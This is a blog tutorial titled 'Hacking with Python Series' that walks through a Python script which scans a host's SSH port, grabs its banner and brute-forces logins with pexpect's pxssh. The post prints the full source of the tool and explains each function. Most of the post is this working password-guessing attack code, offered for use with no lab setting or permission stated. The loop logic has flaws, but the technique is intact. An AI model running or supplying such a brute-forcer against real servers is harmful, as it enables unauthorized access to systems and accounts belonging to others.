Hacking with Python Series: SSH bruteforcing script using PXSSH

This is a guide about how you can create SSH bruteforcing script using python. With this script you can bruteforce the username and password for SSH protocol. Below is the requirement and explanation to create this script.

Library used: PXSSH

Operating System: Kali [ The above library is not meant for windows ]

You can use paramiko library also, Paramiko is another library in python providing SSH feature. If you want to know more about it, follow this link: http://www.anonhack.in/2018/06/making-an-ssh-connection-in-python-using-paramiko-hacking-with-python-series/

If you don’t know how to work with files in python, follow this link: http://www.anonhack.in/2018/06/hacking-with-python-series-open-user-and-password-files-to-read/

This code can do more than just brute forcing, It checks, if SSH port is open. If it is open, It takes the banner. Since I have already told you about how to make socket connection in Python so I thought to add its code in this script.

Code Explanation:

Socket in Python: If you don’t know about making a connection in Python you can visit: Hacking With python: Information Gathering 1

import os: I have imported this to run OS commands, If you have gone through Part 1 of Hacking with Python, I have shared a pdf, that gave you a thorough introduction to important packages in os command. I will be running KALI OS command through this.

found=1 : It is just a variable that will act as a flag. This will check if the username and password works.

def usg(): Simple function to give out the usage property of our function.

def brute(): Function that actually runs brute function and run pxssh to make connection.

def scan(): Function that scans the target for SSH port and grab its banner.

def files(target,user_file,pass_file): function takes the commandline passed target website, username file and password file and run the brute function on it.

def check(): checks the number of arguments passed, if the arguments count is 3 then it will call all the above functions.

Code:

#!/usr/bin/python
import socket
import sys
import os
from pexpect import pxssh
found = 1 #global variable to check the if connection is made
def usg():
	print("[+]USAGE: psshbrute.py hostname userfile passwordfile\n")
	exit()


#The brute function will make use of pxssh to make connection with SSH and try different login with username and passwords.
def brute(target,user,passwd):
	global found
	try:			
		s=pxssh.pxssh()
		s.login(target,user,passwd)
		found=0
		return found
	except Exception as e:
		print(e)
	
def files(target,user_file,pass_file):
	user=user_file
	passw=pass_file

	try:
		print("*********** [+] Bruteforcer Running********** ")
		u=open(user,'r')
		p=open(passw,'r')
		for uline in u.readlines():
			for pline in p.readlines():
				print("[?] Trying:"+uline+":"+pline)
#we are calling the brute function here.
				res=brute(target,uline,pline)
				
				if(found==0):
					print("[+] User and Password Found:\n"+"username:"+uline+"password:"+pline)
					break
                                        #once the username and password is found, we break out of loop.
			              #remove the break to find all combination of username and password.
				
	except Exception as f:
		print(f)	
		u.close()
		p.close()
	
#Scan function is used to make socket connection to check if the port is open and grab the banner if it is open.
def scan():
	try:
		target=sys.argv[1]
		sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
		ip=socket.gethostbyname(target)
		r=sock.connect_ex((ip,22))
		if(r==0):

			print("TARGET IP: "+ip)
			print("[+] PORT 22 is open")
			bann=sock.recv(1024)
			detailbann=bann.decode('utf-8').strip()
			print("[+] TARGET BANNER: "+detailbann)
			
			
		else:
			print("[-] "+target+" PORT is Closed")
			exit()
	except Exception as e:
			print(e)
		

#the very first function we are calling that checks the argument length that the user passed and runs all other functions
def check():

	if len(sys.argv) < 4:
		print("[-] Not Enough arguments.\n")
		usg()
	else:
		target=sys.argv[1]
		user_file=sys.argv[2]
		pass_file=sys.argv[3]
		scan()
		files(target,user_file,pass_file)


check()

OUTPUT:

SSHbruteforcing script in python

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.